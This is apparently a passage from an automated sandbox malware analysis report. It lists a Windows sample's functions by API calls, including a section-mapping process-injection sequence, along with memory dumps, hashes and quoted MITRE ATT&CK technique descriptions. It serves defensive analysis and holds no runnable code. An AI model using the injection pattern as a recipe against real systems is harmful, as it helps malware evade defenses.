NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 172
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5

Function 004173E0 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 269
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004174B0
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 004174C9
FindAtomW.KERNEL32(00000000), ref: 004174D0
GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 004174D8
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004174F0
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417517
MoveFileW.KERNEL32(00000000,00000000), ref: 0041751F
GetVersionExW.KERNEL32(?), ref: 0041752C
DisconnectNamedPipe.KERNEL32(?), ref: 0041753F
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00417584
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00417593
LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004175A9
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004175BB
PulseEvent.KERNEL32(00000000), ref: 004175CB
SetCommState.KERNELBASE(00000000,00000000), ref: 004175F4
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417621
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417632
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041763A
LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2

Strings

k`, xrefs: 00417703
}$, xrefs: 00417727

Memory Dump Source

Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd

Similarity

API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
String ID: k`$}$
API String ID: 2183200751-956986773
Opcode ID: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
Instruction ID: 4b0af0e3fa1ca4ab076df1e70508018619d961bc3f3b7d37d78c72f8efd93fb6
Opcode Fuzzy Hash: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
Instruction Fuzzy Hash: CE911371845524ABC720AB65EC44ADF7F79EF4E351F01406EF50AA3190CB381A85CFAD

Function 02CF003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CF024D

Strings

cess, xrefs: 02CF018D
kernel32.dll, xrefs: 02CF008F, 02CF0095

Memory Dump Source

Source File: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_fbtdajh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f52d848a7eb621d3bcf27de12283cb4e466daf3c2a9a7caa30bfd242752cbc5a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 83525B74A01229DFDBA4CF58C984BACBBB1BF09314F1480D9E54DAB356DB30AA85DF14

Function 004176A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2
InterlockedDecrement.KERNEL32(?), ref: 00417720

Strings

k`, xrefs: 00417703
}$, xrefs: 00417727

Memory Dump Source

Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
Instruction ID: 6a13f396818c81b553958a4f6e0fac96a639a42473e93d8a9fa1ef27fc993d3b
Opcode Fuzzy Hash: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
Instruction Fuzzy Hash: 97213330D886148BCB259F64E8857EA7B30EB49321F11487FD99A972C1CA386CD5CB9D

Function 00417050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041712F
GetProcAddress.KERNEL32(00000000,0041CF58), ref: 0041716C
VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 0041718B

Strings

, xrefs: 00417095

Memory Dump Source

Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

Function 02C108B4 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C108DC
Module32First.KERNEL32(00000000,00000224), ref: 02C108FC

Memory Dump Source

Source File: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c0d000_fbtdajh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5d25f07cf819e0b114c4b2f4bf236a687dfc93fb76aab7d66538658329c57bd7
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 33F0F6315003116FF7203BF8988EB6E77ECEF8A225F100229EA46910C0DB70E9859BA0

Function 02CF0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CF0223,?,?), ref: 02CF0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CF0223,?,?), ref: 02CF0E1E

Memory Dump Source

Source File: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_fbtdajh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f40b6a7c0d257f705cb0e7d4435728bf201dbb2aa5362d75ca5dd7b1c55b98c4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 97D01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02C10573 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C105C4

Memory Dump Source

Source File: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c0d000_fbtdajh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 97f25e3379db076c3f9a06cca4e7997eef67287c4ba1572baa51eaacf3c5230d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A8113C79A40208EFDB01DF98C985E99BBF5AF08750F058094F9489B361D771EA90EF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00417020 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417684), ref: 00417028

Memory Dump Source

Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10

Non-executed Functions

Function 00417220 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00417251
WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 00417275
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041727D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004172BD
GetComputerNameW.KERNEL32(?,?), ref: 004172D1
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004172DF
OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 004172EE
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004172FF

Strings

-, xrefs: 0041730C

Memory Dump Source

Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
Instruction ID: c46b0675b47416d80202c3d70281f3f4f52baec69b8f02f40ede2316a1a36d14
Opcode Fuzzy Hash: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
Instruction Fuzzy Hash: 3121DB30A8430CABD7219FA0DC45BDD7B70FB0C751F1140A9FB59AA1C1CAB819C98B59

Function 00417340 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417374
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041738F
HeapDestroy.KERNEL32(00000000), ref: 004173AE
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004173BD

Memory Dump Source

Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
Instruction ID: ae621add1e0f4e6c3d705ecf9f7467162fa1ce6b68f8d21c2afe26eea802a05a
Opcode Fuzzy Hash: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
Instruction Fuzzy Hash: D701F7B1A442089BD750EB64ED45BEA37B8EB0C746F41006AFB09E7281DF786D84CF59

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
